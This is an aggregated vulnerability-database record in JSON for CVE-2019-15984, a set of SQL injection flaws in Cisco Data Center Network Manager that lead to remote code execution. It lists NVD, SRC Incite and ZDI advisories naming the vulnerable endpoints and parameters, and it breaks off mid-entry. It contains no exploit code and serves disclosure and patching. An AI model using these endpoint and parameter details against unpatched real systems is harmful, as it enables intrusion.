This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getSwitchBandwidthStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
{"cve": [{"lastseen": "2023-02-08T15:40:24", "description": "Multiple vulnerabilities in the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to execute arbitrary SQL commands on an affected device. To exploit these vulnerabilities, an attacker would need administrative privileges on the DCNM application. For more information about these vulnerabilities, see the Details section of this advisory. Note: The severity of these vulnerabilities is aggravated by the vulnerabilities described in the Cisco Data Center Network Manager Authentication Bypass Vulnerabilities advisory, published simultaneously with this one.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-06T08:15:00", "type": "cve", "title": "CVE-2019-15984", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2023-02-02T19:19:00", "cpe": [], "id": "CVE-2019-15984", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15984", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}], 
"srcincite": [{"lastseen": "2022-04-20T17:15:54", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the fm/fmrest/lanConfig/deleteCredentials endpoint. When parsing the switchIds parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "srcincite", "title": "SRC-2020-0005 : Cisco Data Center Network Manager ConfigTemplateHandler getConfigTemplateJobInstance SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, 
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0005", "href": "https://srcincite.io/advisories/src-2020-0005/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}, {"lastseen": "2022-04-20T17:15:55", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the rest/smu/getjobs endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. 
More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "srcincite", "title": "SRC-2020-0003 : Cisco Data Center Network Manager SMUJobController getSMUTasks SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0003", "href": "https://srcincite.io/advisories/src-2020-0003/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}, {"lastseen": "2022-04-20T17:15:56", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the fm/fmrest/health/sqlCommandAPI endpoint. 
When parsing the queryString parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "srcincite", "title": "SRC-2020-0001 : Cisco Data Center Network Manager HealthRest sqlCommandAPI Arbitrary SQL Execution Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0001", "href": "https://srcincite.io/advisories/src-2020-0001/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}, {"lastseen": "2022-04-20T17:15:54", 
"description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the getPortMappingDataLength endpoint of the PortMapperWS service. When parsing the colFilterStr parameter in the getPortMappingDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-20T00:00:00", "type": "srcincite", "title": "SRC-2020-0006 : Cisco Data Center Network Manager PortMapperHandler getPortMappingDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0006", "href": "https://srcincite.io/advisories/src-2020-0006/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}, {"lastseen": "2022-04-20T17:15:55", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of requests to the fm/fmrest/lanConfig/deleteCredentials endpoint. When parsing the switchIds parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n\n**Affected Vendors:**\n\nCisco\n\n**Affected Products:**\n\nData Center Network Manager\n\n**Vendor Response:**\n\nCisco has issued an update to correct this vulnerability. 
More details can be found at: \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject>\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "srcincite", "title": "SRC-2020-0004 : Cisco Data Center Network Manager SwitchCredentialsHandler deleteCredentials SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "SRC-2020-0004", "href": "https://srcincite.io/advisories/src-2020-0004/", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": ""}], "zdi": [{"lastseen": "2022-01-31T22:11:36", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/lanIslStat endpoint. 
When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanIslStatListES SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-049", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-049/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:18", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. 
When parsing the sortType parameter of the printSwitchTable endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanSwitchListWithoutUsedPorts SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-071", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-071/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:37", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. 
The specific flaw exists within the processing of requests to the fm/fmrest/endportStat endpoint. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getEndDeviceStatListESBySQL SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-041", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-041/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:42", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. 
The specific flaw exists within the processing of requests to the fm/fmrest/config/templates endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getAllTemplate SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-030", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-030/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:41", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. 
The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getHostEnclList endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-034", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-034/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. 
The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getHostEnclList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-065", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-065/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:07", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. 
Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getN3KBufferStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getN3KBufferStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-092", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-092/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:39", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data 
Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing a packet to the getHostEnclList SOAP endpoint, the process does not properly validate a user-supplied string for the sortType parameter before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-039", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-039/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:30", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/topdown/topology service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanIslListWithPM SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 